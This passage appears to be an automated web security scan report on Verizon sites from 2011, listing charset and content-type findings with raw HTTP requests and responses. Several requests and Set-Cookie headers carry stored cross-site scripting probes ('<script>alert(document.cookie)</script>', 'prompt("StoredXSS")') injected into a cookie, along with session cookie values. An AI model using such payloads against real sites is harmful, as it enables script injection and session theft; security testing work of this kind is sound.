Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 238563
Expires: Mon, 05 Sep 2011 22:38:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:27 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:38:27 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
   Verizon | R
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.7. http://www22.verizon.com/residentialhelp/fiostv

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /residentialhelp/fiostv

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239405
Expires: Mon, 05 Sep 2011 22:24:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:31 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; expires=Wed, 05-Sep-2012 22:24:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.8. http://www22.verizon.com/residentialhelp/inhomeagent

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /residentialhelp/inhomeagent HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215655
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.9. http://www22.verizon.com/residentialhelp/inhomeagent/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /residentialhelp/inhomeagent/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /residentialhelp/inhomeagent/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 215661
Expires: Mon, 05 Sep 2011 22:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:25 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=InHomeAgent&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/l
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.10. http://www22.verizon.com/residentialhelp/phone

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /residentialhelp/phone

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230544
Expires: Mon, 05 Sep 2011 22:39:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:39:57 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:39:57 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

26. Content type incorrectly stated
There are 73 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Summary

Severity:   Information
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:35:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; path=/
Set-Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

Resource /SMBPortal707d3(a)c76e008a5a1/smb could not be resolved for locale null.

26.2. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /fonts/verizonApex-book-ex.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /fonts/verizonApex-book-ex.woff HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/stylesheets/fonts.css?v=11-09
Origin: http://www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Tue, 12 Jul 2011 03:35:57 GMT
Content-Length: 26612
ETag: "67f4-4e1bc11d"
Accept-Ranges: bytes
Expires: Mon, 05 Sep 2011 22:15:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:15:05 GMT
Connection: close
Access-Control-Allow-Origin: http://www.verizonwireless.com

wOFFOTTO..g................................CFF ...0..R....J..9.FFTM..S.........R.':GDEF..S....C...P.    ..GPOS..T(......2& .cBGSUB..Z........^..5.OS/2..^....Z...`:C..cmap..^....T...^.f..head..a8...4...6
...[SNIP]...

26.3. http://cache.vzw.com/globalnav/globalnavmenu.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /globalnav/globalnavmenu.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /globalnav/globalnavmenu.txt?lpd=2011Jul31030844 HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=CT

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Sun, 31 Jul 2011 07:16:28 GMT
Content-Length: 35653
ETag: "8b45-4e35014c"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:14:34 GMT
Connection: close

gNav.buildNav({"mainNavLinks":[{"menuItem":{"label":"Explore","hbx":"//global//explore","role":{"signedOut":{"path":"/b2c/explore","domain":"vzw","id":"gn13"}},"columns":[[{"menuItem":{"label":"Why Ve
...[SNIP]...

26.4. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/apex.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/fonts/apex.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/fonts/apex.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 37874
ETag: "93f2-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:45 GMT
Connection: close

CWS    ....x...y8.m.7.s..Z(.R).YK.H..X..k.1c2.\R..RJ."2-.B."..J.hTq.......v...~...~........;~..?>.............k(.Pw.. ..M..'...rh.l*..r..i..M2...?X.m....................VCCCIYEIEE.%......D(..KKm..U..G.[
...[SNIP]...

26.5. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/fonts/superscript.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/fonts/superscript.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/fonts/superscript.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V1Z2=0; mp__utma=48181944.1605757161.1315237028.1315237028.1315237028.1; mp__utmz=48181944.1315237028.1.2.utmccn=(referral)|utmcsr=wireless.amazon.com|utmcct=/help/200307920/ref=bp_hp_br|utmcmd=referral; mbox=session#1315237011507-275926#1315239441|PC#1315237011507-275926.17#1316447181|check#true#1315237641

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:24:54 GMT
Content-Length: 18168
ETag: "46f8-4c8a77f6"
Accept-Ranges: bytes
Date: Mon, 05 Sep 2011 22:16:46 GMT
Connection: close

CWS    .u..x...    \.I.>|.. .D...YB ..*(...o.!.= . ......Q...Y].lDP6.QT.mpE\....mPP.........i.{f....7sg..~c....S..:..o.N..,.Q....8......._....D
..D-..L.....(..e............s.b....."..X$F%'.]./J..9;.jN"].R.
...[SNIP]...

26.6. http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cache.vzw.com
Path:   /images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /images_b2c/flash_containers/hpMarquee/images/business/4g_new_markets_spotlight_072111.swf HTTP/1.1
Host: cache.vzw.com
Proxy-Connection: keep-alive
Referer: http://cache.vzw.com/images_b2c/flash_containers/hpMarquee/swf/tab_slider.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
